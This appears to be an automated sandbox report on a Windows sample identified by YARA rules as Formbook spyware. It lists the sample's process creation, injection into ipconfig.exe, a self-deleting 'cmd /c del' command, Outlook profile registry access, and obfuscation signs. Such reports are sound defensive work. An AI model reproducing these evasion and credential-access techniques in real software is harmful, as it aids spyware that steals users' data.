          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: scn14092020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@19/11
          Source: C:\Users\user\Desktop\scn14092020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scn14092020.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
          Source: C:\Users\user\Desktop\scn14092020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\scn14092020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: scn14092020.exe Virustotal: Detection: 17%
          Source: scn14092020.exe ReversingLabs: Detection: 14%
          Source: unknown Process created: C:\Users\user\Desktop\scn14092020.exe 'C:\Users\user\Desktop\scn14092020.exe'
          Source: unknown Process created: C:\Users\user\Desktop\scn14092020.exe C:\Users\user\Desktop\scn14092020.exe
          Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scn14092020.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\scn14092020.exe Process created: C:\Users\user\Desktop\scn14092020.exe C:\Users\user\Desktop\scn14092020.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scn14092020.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: scn14092020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: scn14092020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: ipconfig.pdb source: scn14092020.exe, 00000001.00000002.208457424.0000000000EF0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: scn14092020.exe, 00000001.00000002.208457424.0000000000EF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: scn14092020.exe, 00000001.00000002.208471225.0000000000F30000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.436685521.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: scn14092020.exe, ipconfig.exe

          Data Obfuscation:

          Binary contains a suspicious time stamp
          Source: initial sample Static PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 0_2_00FF02A1 push es; retf 0_2_00FF02F0
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_004149C5 pushfd; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_005D02A1 push es; retf 1_2_005D02F0
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: 1_2_00FAD0D1 push ecx; ret 1_2_00FAD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_02CFD0D1 push ecx; ret 4_2_02CFD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024CAAF5 push eax; ret 4_2_024CAB48
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024CAB4B push eax; ret 4_2_024CABB2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024CAB42 push eax; ret 4_2_024CAB48
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024CABAC push eax; ret 4_2_024CABB2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024C48E6 push es; retf 4_2_024C48ED
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024C4977 push esi; ret 4_2_024C4978
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024C49C5 pushfd; iretd 4_2_024C49C6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024C4E46 push 76AC60C6h; retf 4_2_024C4E4B
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_024C7C73 push cs; retf 4_2_024C7C7E
          Source: initial sample Static PE information: section name: .text entropy: 7.9315085015

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\scn14092020.exe Process information set: NOOPENFILEERRORBOX